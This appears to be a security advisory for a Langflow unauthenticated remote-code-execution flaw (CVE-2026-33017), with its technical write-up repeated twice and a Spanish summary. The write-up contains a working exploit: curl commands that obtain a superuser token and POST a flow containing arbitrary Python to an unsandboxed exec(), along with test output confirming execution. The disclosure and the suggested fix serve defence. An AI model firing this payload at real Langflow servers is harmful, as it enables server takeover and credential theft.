CVE-2026-33017

Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. This issue has been fixed in version 1.9.0.

Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. This issue has been fixed in version 1.9.0.

## Summary The `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint allows building public flows without requiring authentication. When the optional `data` parameter is supplied, the endpoint uses **attacker-controlled flow data** (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to `exec()` with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed `/api/v1/validate/code` by adding authentication. The `build_public_tmp` endpoint is **designed** to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. ## Affected Code ### Vulnerable Endpoint (No Authentication) **File:** `src/backend/base/langflow/api/v1/chat.py`, lines 580-657 ```python @router.post("/build_public_tmp/{flow_id}/flow") async def build_public_tmp( *, flow_id: uuid.UUID, data: Annotated[FlowDataRequest | None, Body(embed=True)] = None, # ATTACKER CONTROLLED request: Request, # ... NO Depends(get_current_active_user) -- MISSING AUTH ... ): """Build a public flow without requiring authentication.""" client_id = request.cookies.get("client_id") owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id) job_id = await start_flow_build( flow_id=new_flow_id, data=data, # Attacker's data passed directly to graph builder current_user=owner_user, ... ) ``` Compare with the authenticated build endpoint at line 138, which requires `current_user: CurrentActiveUser`. ### Code Execution Chain When attacker-supplied `data` is provided, it flows through: 1. `start_flow_build(data=attacker_data)` → `generate_flow_events()` -- `build.py:81` 2. `create_graph()` → `build_graph_from_data(payload=data.model_dump())` -- `build.py:298` 3. `Graph.from_payload(payload)` parses attacker nodes -- `base.py:1168` 4. `add_nodes_and_edges()` → `initialize()` → `_build_graph()` -- `base.py:270,527` 5. `_instantiate_components_in_vertices()` iterates nodes -- `base.py:1323` 6. `vertex.instantiate_component()` → `instantiate_class(vertex)` -- `loading.py:28` 7. `code = custom_params.pop("code")` extracts attacker code -- `loading.py:43` 8. `eval_custom_component_code(code)` → `create_class(code, class_name)` -- `eval.py:9` 9. `prepare_global_scope(module)` -- `validate.py:323` 10. `exec(compiled_code, exec_globals)` -- **ARBITRARY CODE EXECUTION** -- `validate.py:397` ### Unsandboxed exec() in prepare_global_scope **File:** `src/lfx/src/lfx/custom/validate.py`, lines 340-397 ```python def prepare_global_scope(module): exec_globals = globals().copy() # Imports are resolved first (any module can be imported) for node in imports: module_obj = importlib.import_module(module_name) # line 352 exec_globals[variable_name] = module_obj # Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef) if definitions: combined_module = ast.Module(body=definitions, type_ignores=[]) compiled_code = compile(combined_module, "<string>", "exec") exec(compiled_code, exec_globals) # line 397 - ARBITRARY CODE EXECUTION ``` **Critical detail:** `prepare_global_scope` executes `ast.Assign` nodes. An attacker's code like `_x = os.system("id")` is an assignment and will be executed during graph building -- before the flow even "runs." ## Prerequisites 1. Target Langflow instance has at least **one public flow** (common for demos, chatbots, shared workflows) 2. Attacker knows the public flow's UUID (discoverable via shared links/URLs) 3. No authentication required -- only a `client_id` cookie (any arbitrary string value) When `AUTO_LOGIN=true` (the **default**), all prerequisites can be met by an unauthenticated attacker: 1. `GET /api/v1/auto_login` → obtain superuser token 2. `POST /api/v1/flows/` → create a public flow 3. Exploit via `build_public_tmp` without any auth ## Proof of Concept ### Tested Against - **Langflow version 1.7.3** (latest stable release, installed via `pip install langflow`) - **Fully reproducible**: 6/6 runs confirmed RCE (two sets of 3 runs each) ### Step 1: Obtain a Public Flow ID (In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.) ```bash # Get superuser token (no credentials needed when AUTO_LOGIN=true) TOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r '.access_token') # Create a public flow FLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d '{"name":"test","data":{"nodes":[],"edges":[]},"access_type":"PUBLIC"}' \ | jq -r '.id') echo "Public Flow ID: $FLOW_ID" ``` ### Step 2: Exploit -- Unauthenticated RCE ```bash # EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint # NO Authorization header, NO API key, NO credentials curl -X POST "http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow" \ -H "Content-Type: application/json" \ -b "client_id=attacker" \ -d '{ "data": { "nodes": [{ "id": "Exploit-001", "type": "genericNode", "position": {"x":0,"y":0}, "data": { "id": "Exploit-001", "type": "ExploitComp", "node": { "template": { "code": { "type": "code", "required": true, "show": true, "multiline": true, "value": "import os, socket, json as _json\n\n_proof = os.popen(\"id\").read().strip()\n_host = socket.gethostname()\n_write = open(\"/tmp/rce-proof\",\"w\").write(f\"{_proof} on {_host}\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n display_name=\"X\"\n outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n def r(self)->Data:\n return Data(data={})", "name": "code", "password": false, "advanced": false, "dynamic": false }, "_type": "Component" }, "description": "X", "base_classes": ["Data"], "display_name": "ExploitComp", "name": "ExploitComp", "frozen": false, "outputs": [{"types":["Data"],"selected":"Data","name":"o","display_name":"O","method":"r","value":"__UNDEFINED__","cache":true,"allows_loop":false,"tool_mode":false,"hidden":null,"required_inputs":null,"group_outputs":false}], "field_order": ["code"], "beta": false, "edited": false } } }], "edges": [] }, "inputs": null }' ``` ### Step 3: Verify Code Execution ```bash # Wait 2 seconds for async graph building sleep 2 # Check proof file written by attacker's code on the server cat /tmp/rce-proof # Output: uid=1000(aviral) gid=1000(aviral) groups=... on kali ``` ### Actual Test Results ``` ====================================================================== LANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST ====================================================================== Version: Langflow 1.7.3 RUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH) HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19 *** REMOTE CODE EXECUTION CONFIRMED *** canary: RCE-f0d19b36 hostname: kali uid: 1000 whoami: aviral id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),... uname: Linux 6.16.8+kali-amd64 RUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH) HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832 *** REMOTE CODE EXECUTION CONFIRMED *** canary: RCE-6037a271 RUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH) HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7 *** REMOTE CODE EXECUTION CONFIRMED *** canary: RCE-4a796556 FINAL RESULTS Total checks: 15 VULNERABLE: 15 SAFE: 0 RCE confirmed: 3/3 runs Reproducible: YES (100%) ``` ## Impact - **Unauthenticated Remote Code Execution** with full server process privileges - **Complete server compromise**: arbitrary file read/write, command execution - **Environment variable exfiltration**: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated) - **Reverse shell access** for persistent access - **Lateral movement** within the network - **Data exfiltration** from all flows, messages, and stored credentials in the database ## Comparison with CVE-2025-3248 | Aspect | CVE-2025-3248 | This Vulnerability | |--------|--------------|-------------------| | **Endpoint** | `/api/v1/validate/code` | `/api/v1/build_public_tmp/{id}/flow` | | **Fix applied** | Added `Depends(get_current_active_user)` | None -- NEW vulnerability | | **Root cause** | Missing auth on code validation | Unauthenticated endpoint accepts attacker-controlled executable code via `data` param | | **Code execution via** | `validate_code()` → `exec()` | `create_class()` → `prepare_global_scope()` → `exec()` | | **CISA KEV** | Yes (actively exploited) | N/A (new finding) | | **Can simple auth fix?** | Yes (and it was fixed) | No -- endpoint is *designed* to be unauthenticated; the `data` parameter must be removed | ## Recommended Fix ### Immediate (Short-term) **Remove the `data` parameter** from `build_public_tmp`. Public flows should only execute their stored flow data, never attacker-supplied data: ```python @router.post("/build_public_tmp/{flow_id}/flow") async def build_public_tmp( *, flow_id: uuid.UUID, inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None, # REMOVED: data parameter -- public flows must use stored data only ... ): ``` In `generate_flow_events` → `create_graph()`, only the `build_graph_from_db` path should be reachable for unauthenticated requests: ```python async def create_graph(fresh_session, flow_id_str, flow_name): # For public flows, ALWAYS load from database, never from user data return await build_graph_from_db( flow_id=flow_id, session=fresh_session, ... ) ```

## Summary The `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint allows building public flows without requiring authentication. When the optional `data` parameter is supplied, the endpoint uses **attacker-controlled flow data** (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to `exec()` with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed `/api/v1/validate/code` by adding authentication. The `build_public_tmp` endpoint is **designed** to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. ## Affected Code ### Vulnerable Endpoint (No Authentication) **File:** `src/backend/base/langflow/api/v1/chat.py`, lines 580-657 ```python @router.post("/build_public_tmp/{flow_id}/flow") async def build_public_tmp( *, flow_id: uuid.UUID, data: Annotated[FlowDataRequest | None, Body(embed=True)] = None, # ATTACKER CONTROLLED request: Request, # ... NO Depends(get_current_active_user) -- MISSING AUTH ... ): """Build a public flow without requiring authentication.""" client_id = request.cookies.get("client_id") owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id) job_id = await start_flow_build( flow_id=new_flow_id, data=data, # Attacker's data passed directly to graph builder current_user=owner_user, ... ) ``` Compare with the authenticated build endpoint at line 138, which requires `current_user: CurrentActiveUser`. ### Code Execution Chain When attacker-supplied `data` is provided, it flows through: 1. `start_flow_build(data=attacker_data)` → `generate_flow_events()` -- `build.py:81` 2. `create_graph()` → `build_graph_from_data(payload=data.model_dump())` -- `build.py:298` 3. `Graph.from_payload(payload)` parses attacker nodes -- `base.py:1168` 4. `add_nodes_and_edges()` → `initialize()` → `_build_graph()` -- `base.py:270,527` 5. `_instantiate_components_in_vertices()` iterates nodes -- `base.py:1323` 6. `vertex.instantiate_component()` → `instantiate_class(vertex)` -- `loading.py:28` 7. `code = custom_params.pop("code")` extracts attacker code -- `loading.py:43` 8. `eval_custom_component_code(code)` → `create_class(code, class_name)` -- `eval.py:9` 9. `prepare_global_scope(module)` -- `validate.py:323` 10. `exec(compiled_code, exec_globals)` -- **ARBITRARY CODE EXECUTION** -- `validate.py:397` ### Unsandboxed exec() in prepare_global_scope **File:** `src/lfx/src/lfx/custom/validate.py`, lines 340-397 ```python def prepare_global_scope(module): exec_globals = globals().copy() # Imports are resolved first (any module can be imported) for node in imports: module_obj = importlib.import_module(module_name) # line 352 exec_globals[variable_name] = module_obj # Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef) if definitions: combined_module = ast.Module(body=definitions, type_ignores=[]) compiled_code = compile(combined_module, "<string>", "exec") exec(compiled_code, exec_globals) # line 397 - ARBITRARY CODE EXECUTION ``` **Critical detail:** `prepare_global_scope` executes `ast.Assign` nodes. An attacker's code like `_x = os.system("id")` is an assignment and will be executed during graph building -- before the flow even "runs." ## Prerequisites 1. Target Langflow instance has at least **one public flow** (common for demos, chatbots, shared workflows) 2. Attacker knows the public flow's UUID (discoverable via shared links/URLs) 3. No authentication required -- only a `client_id` cookie (any arbitrary string value) When `AUTO_LOGIN=true` (the **default**), all prerequisites can be met by an unauthenticated attacker: 1. `GET /api/v1/auto_login` → obtain superuser token 2. `POST /api/v1/flows/` → create a public flow 3. Exploit via `build_public_tmp` without any auth ## Proof of Concept ### Tested Against - **Langflow version 1.7.3** (latest stable release, installed via `pip install langflow`) - **Fully reproducible**: 6/6 runs confirmed RCE (two sets of 3 runs each) ### Step 1: Obtain a Public Flow ID (In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.) ```bash # Get superuser token (no credentials needed when AUTO_LOGIN=true) TOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r '.access_token') # Create a public flow FLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d '{"name":"test","data":{"nodes":[],"edges":[]},"access_type":"PUBLIC"}' \ | jq -r '.id') echo "Public Flow ID: $FLOW_ID" ``` ### Step 2: Exploit -- Unauthenticated RCE ```bash # EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint # NO Authorization header, NO API key, NO credentials curl -X POST "http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow" \ -H "Content-Type: application/json" \ -b "client_id=attacker" \ -d '{ "data": { "nodes": [{ "id": "Exploit-001", "type": "genericNode", "position": {"x":0,"y":0}, "data": { "id": "Exploit-001", "type": "ExploitComp", "node": { "template": { "code": { "type": "code", "required": true, "show": true, "multiline": true, "value": "import os, socket, json as _json\n\n_proof = os.popen(\"id\").read().strip()\n_host = socket.gethostname()\n_write = open(\"/tmp/rce-proof\",\"w\").write(f\"{_proof} on {_host}\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n display_name=\"X\"\n outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n def r(self)->Data:\n return Data(data={})", "name": "code", "password": false, "advanced": false, "dynamic": false }, "_type": "Component" }, "description": "X", "base_classes": ["Data"], "display_name": "ExploitComp", "name": "ExploitComp", "frozen": false, "outputs": [{"types":["Data"],"selected":"Data","name":"o","display_name":"O","method":"r","value":"__UNDEFINED__","cache":true,"allows_loop":false,"tool_mode":false,"hidden":null,"required_inputs":null,"group_outputs":false}], "field_order": ["code"], "beta": false, "edited": false } } }], "edges": [] }, "inputs": null }' ``` ### Step 3: Verify Code Execution ```bash # Wait 2 seconds for async graph building sleep 2 # Check proof file written by attacker's code on the server cat /tmp/rce-proof # Output: uid=1000(aviral) gid=1000(aviral) groups=... on kali ``` ### Actual Test Results ``` ====================================================================== LANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST ====================================================================== Version: Langflow 1.7.3 RUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH) HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19 *** REMOTE CODE EXECUTION CONFIRMED *** canary: RCE-f0d19b36 hostname: kali uid: 1000 whoami: aviral id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),... uname: Linux 6.16.8+kali-amd64 RUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH) HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832 *** REMOTE CODE EXECUTION CONFIRMED *** canary: RCE-6037a271 RUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH) HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7 *** REMOTE CODE EXECUTION CONFIRMED *** canary: RCE-4a796556 FINAL RESULTS Total checks: 15 VULNERABLE: 15 SAFE: 0 RCE confirmed: 3/3 runs Reproducible: YES (100%) ``` ## Impact - **Unauthenticated Remote Code Execution** with full server process privileges - **Complete server compromise**: arbitrary file read/write, command execution - **Environment variable exfiltration**: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated) - **Reverse shell access** for persistent access - **Lateral movement** within the network - **Data exfiltration** from all flows, messages, and stored credentials in the database ## Comparison with CVE-2025-3248 | Aspect | CVE-2025-3248 | This Vulnerability | |--------|--------------|-------------------| | **Endpoint** | `/api/v1/validate/code` | `/api/v1/build_public_tmp/{id}/flow` | | **Fix applied** | Added `Depends(get_current_active_user)` | None -- NEW vulnerability | | **Root cause** | Missing auth on code validation | Unauthenticated endpoint accepts attacker-controlled executable code via `data` param | | **Code execution via** | `validate_code()` → `exec()` | `create_class()` → `prepare_global_scope()` → `exec()` | | **CISA KEV** | Yes (actively exploited) | N/A (new finding) | | **Can simple auth fix?** | Yes (and it was fixed) | No -- endpoint is *designed* to be unauthenticated; the `data` parameter must be removed | ## Recommended Fix ### Immediate (Short-term) **Remove the `data` parameter** from `build_public_tmp`. Public flows should only execute their stored flow data, never attacker-supplied data: ```python @router.post("/build_public_tmp/{flow_id}/flow") async def build_public_tmp( *, flow_id: uuid.UUID, inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None, # REMOVED: data parameter -- public flows must use stored data only ... ): ``` In `generate_flow_events` → `create_graph()`, only the `build_graph_from_db` path should be reachable for unauthenticated requests: ```python async def create_graph(fresh_session, flow_id_str, flow_name): # For public flows, ALWAYS load from database, never from user data return await build_graph_from_db( flow_id=flow_id, session=fresh_session, ... ) ```

Langflow es una herramienta para construir y desplegar agentes y flujos de trabajo impulsados por IA. En versiones anteriores a la 1.9.0, el endpoint POST /api/v1/build_public_tmp/{flow_id}/flow permite construir flujos públicos sin requerir autenticación. Cuando se suministra el parámetro opcional data, el endpoint utiliza datos de flujo controlados por el atacante (que contienen código Python arbitrario en las definiciones de nodos) en lugar de los datos de flujo almacenados en la base de datos. Este código se pasa a exec() sin ningún sandboxing, lo que resulta en una ejecución remota de código no autenticada. Esto es distinto de CVE-2025-3248, que corrigió /api/v1/validate/code añadiendo autenticación. El endpoint build_public_tmp está diseñado para no requerir autenticación (para flujos públicos) pero acepta incorrectamente datos de flujo suministrados por el atacante que contienen código ejecutable arbitrario. Este problema ha sido solucionado en la versión 1.9.0.